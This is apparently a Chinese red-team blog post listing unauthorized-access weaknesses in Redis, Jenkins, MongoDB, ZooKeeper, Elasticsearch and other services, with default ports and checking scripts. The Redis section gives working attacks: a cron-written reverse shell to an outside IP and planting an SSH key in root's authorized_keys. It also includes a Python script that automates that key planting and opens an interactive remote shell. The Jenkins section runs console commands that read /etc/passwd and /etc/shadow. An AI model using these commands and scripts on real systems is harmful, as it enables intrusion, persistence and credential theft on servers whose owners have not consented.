未授权漏洞

redteam 外部打点 未授权
redteam
发布日期:   2022-03-31
文章字数:   1.6k
阅读时长:   8 分
阅读次数:  

这类问题覆盖的应用、利用方式较广,因此只举例频次较高的漏洞。
文章内容主要摘自某红队系列丛书,将市面上现在流传的 redteam 系列书籍进行一个学习记录。

0x01 Redis

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库

redis-cli

$ redis-cli -h 127.0.0.1 -p 6379
127.0.0.1:6379> keys *
(empty array)
127.0.0.1:6379>

写入文件

┌──(kali㉿kali)-[~/vulhub/redis/4-unacc]
└─$ redis-cli -h 127.0.0.1 -p 6379 
127.0.0.1:6379> keys *
(empty array)
127.0.0.1:6379> CONFIG GET dir

1) "dir"
2) "/data"
   127.0.0.1:6379> CONFIG SET dir /tmp/
   OK
   127.0.0.1:6379> SET foobar "who are you? f1ve"
   OK
   127.0.0.1:6379> CONFIG GET dbfilename
3) "dbfilename"
4) "dump.rdb"
   127.0.0.1:6379> CONFIG SET dbfilename write_file.log
   OK
   127.0.0.1:6379> save
   OK
   127.0.0.1:6379>

反弹shell-Linux

在redis以root权限运行

127.0.0.1:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.186.26/4444 0>&1\n"
OK
127.0.0.1:6379> CONFIG set dir /var/spool/cron
OK
127.0.0.1:6379> CONFIG SET dbfilename root
OK
127.0.0.1:6379> save

写入公钥

#获取rsa
$ ssh-keygen -t rsa

#将公钥写入foo.txt,注意内容前后要加2个换行
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt

#将foo.txt放入键crackit里
cat foo.txt | redis-cli -h IP -x set crackit

#连接目标
redis-cli -h IP
#设置目标的redis的配置文件
#设置数据库备份目录为/root/.ssh/
127.0.0.1:6379> CONFIG SET dir /root/.ssh/
OK
#设置数据库备份文件名为authorized_keys
127.0.0.1:6379> CONFIG set dbfilename "authorized_keys"
OK
#此时公钥成功写入目标机,文件名为authorized_keys
127.0.0.1:6379> save
OK

#利用私钥连接目标
ssh -i /root/.ssh/id_rsa root@127.0.0.1

set x "\n\n\n"

脚本检测:

可以自动化执行上述写入公钥步骤,并且执行 id 命令

#coding:utf-8
#redis未授权交互式检测脚本
#commands: python3 redis_shell.py ip

import redis
import sys
import paramiko

rsa_pub = '/home/kali/.ssh/id_rsa.pub'	# 公钥路径
pkey = '/home/kali/.ssh/id_rsa'	#密钥路径

# 获取公钥内容
def get_id_rsa_pub():
  with open(rsa_pub, 'rt') as f:
    id_rsa_pub = '\n\n\n{}\n\n'.format(f.read())
    return id_rsa_pub
  
def shell_redis(ip):
  try:
    r = redis.Redis(host=ip, port=6379, socket_timeout=5)
    r.config_set('dir', '/root/.ssh/')
    print('[ok] : config set dir /root/.ssh/')
    r.config_set('dbfilename', 'authorized_keys')
    print('[ok] : config set dbfilename "authorized_keys"')
    id_rsa_pub = get_id_rsa_pub()
    r.set('crackit', id_rsa_pub)
    print('[ok] : set crackit')
    r.save()
    print('[ok] : save')
    key = paramiko.RSAKey.from_private_key_file(pkey)
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(ip, port=22, username="root", pkey=key, timeout=5)
    ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('id')
    content = ssh_stdout.readlines()
    if content:
      print("[ok] connect to {} : {}".format(ip, content[0]))
    while True:
      command = input('{} >>> '.format(ip))
      ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(command)
      contents = ssh_stdout.readlines()
      for content in contents:
        print(content)
  except Exception as e:
    error = e.args
    if error == ('',):
      error = 'save error'
    print('[-] [{}] : {}'.format(error, ip))

if __name__ == '__main__':
  ip = sys.argv[1]
  shell_redis(ip)

清空数据库

127.0.0.1:6379> FLUSHALL
OK

安装配置可参考文章:

https://www.cnblogs.com/-mo-/p/11487797.html

0x02 Jenkins

默认是8080端口 未授权访问就是任意用户都能访问 都能执行命令

127.0.0.1:8080/jenkins/manage

127.0.0.1:8080/jenkins/script

#命令集合
println "whoami".execute().text

#Linux
println "ifconfig -a".execute().text
println "cat /etc/passwd".execute().text
println "cat /etc/shadow".execute().text

#Windows
println "ipconfig /all".execute().text
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ipconfig'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err>$serr"

进入后台

执行命令

也可以添加Terminal Plugin插件

0x03 MongoDB

默认端口:27017

脚本检测

# coding:utf-8
# mongodb未授权检测脚本
# usage: python3 mongodb_unauth.py ip port
# 默认端口 28017 和 27017

from pymongo import MongoClient
import sys

ip = sys.argv[1]
port = int(sys.argv[2])

try:
	conn = MongoClient(ip, port, socketTimeoutMS=5000)	#连接MongoDB,延时5秒
	dbs = conn.database_names()
	print('[ok] -> {}:{} database_names : {}'.format(ip, port, dbs))
except Exception as e:
	error = e.args
	print('[-] -> {}:{} error : {}'.format(ip, port, error))

0x04 ZooKeeper

默认端口:2181 2171

ls /	# 查看所有节点
get /	#获取某个节点信息

脚本检测

# coding:utf-8
# python3 zookeeper_unauth.py IP 2181

from kazoo.client import KazooClient
import sys

# 检测是否存在未授权漏洞
def check_zookeeper():
	try:
		zk = KazooClient(hosts='{}:{}'.format(ip, port))
		zk.start()
		childrens = zk.get_children('/')
		if len(childrens) > 0:
			print('[ok] -> {}:{} {}'.format(ip, port, childrens))
		zk.stop()
	except Exception as e:
		zk.stop()
		error = e.args
		print('[-] error: {}'.format(error))

if __name__ == '__main__':
	ip = sys.argv[1]
	port = sys.argv[2]
	check_zookeeper()

0x05 Elasticsearch

默认端口:9200

http://localhost:9200/_plugin/head/	web管理界面
http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search	查看数据库敏感信息
http://localhost:9200/_nodes	查看节点数据

脚本检测

# coding:utf-8
# elasticsearch未授权检测脚本
# usage: python3 elasticsearch_unauth.py ip port
# 默认端口9200
# http://localhost:9200/_plugin/head/ web管理界面
# http://localhost:9200/_cat/indices
# http://localhost:9200/_river/_search 查看数据库敏感信息
# http://localhost:9200/_nodes 查看节点数据

import sys
from elasticsearch import Elasticsearch
import requests	
import json

ip = sys.argv[1]
port = int(sys.argv[2]) # 9200
try:
    es = Elasticsearch("{}:{}".format(ip, port), timeout=5)  # 连接Elasticsearch,延时5秒
    es.indices.create(index='unauth_text')
    print('[+] 成功连接 :{}'.format(ip))
    print('[+] {} -> 成功创建测试节点unauth_text'.format(ip))
    es.index(index="unauth_text", doc_type="test-type", id=2, body={"text": "text"})
    print('[+] {} -> 成功往节点unauth_text插入数据'.format(ip))
    ret = es.get(index="unauth_text", doc_type="test-type", id=2)
    print('[+] {} -> 成功获取节点unauth_text数据 : {}'.format(ip, ret))
    es.indices.delete(index='unauth_text')
    print('[+] {} -> 清除测试节点unauth_text数据'.format(ip))
    print('[ok] {} -> 存在ElasticSearch未授权漏洞'.format(ip))

    print('尝试获取节点信息:↓')
    text = json.loads(requests.get(url='http://{}:{}/_nodes'.format(ip, port), timeout=5).text)
    nodes_total = text['_nodes']['total']
    nodes = list(text['nodes'].keys())
    print('[ok] {} -> [{}] : {}'.format(ip, nodes_total, nodes))

except Exception as e:
    error = e.args
    print('[-] -> {}  error : {}'.format(ip, error))

0x06 Memcached

默认端口:11211

提示连接成功表示存在漏洞

telnet <target> 11211nc -vv <target> 11211

0x07 Hadoop

a) HDFS

NameNode	默认端口 50070
DataNode	默认端口 50075
httpfs	默认端口 14000
journalnode	默认端口 8480

b) YARN(JobTracker)

ResourceManager	默认端口 8088
JobTracker	默认端口 50030
TaskTracker	默认端口 50060

c) Hue

Hue	默认端口 8080

d) YARN(JobTracker)

master	默认端口 60010
regionserver	默认端口 60030

e) hive-server2

hive-server2	默认端口 10000

f) spark-jdbcserver

spark-jdbcserver	默认端口 10003

0x08 couchdb

默认端口5984

couchdb的配置里将bind_address设置为0.0.0.0则存在未授权访问

0x09 ldap

使用工具 ldap admin直接连接即可

脚本合集

https://github.com/f1veT/VulScan/find/master

文章作者: f1veseven
文章链接: http://f1veseven.github.io/2022/03/31/wei-shou-quan-fang-wen-lou-dong/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 f1veseven !
redteam 外部打点 未授权
评论
  目录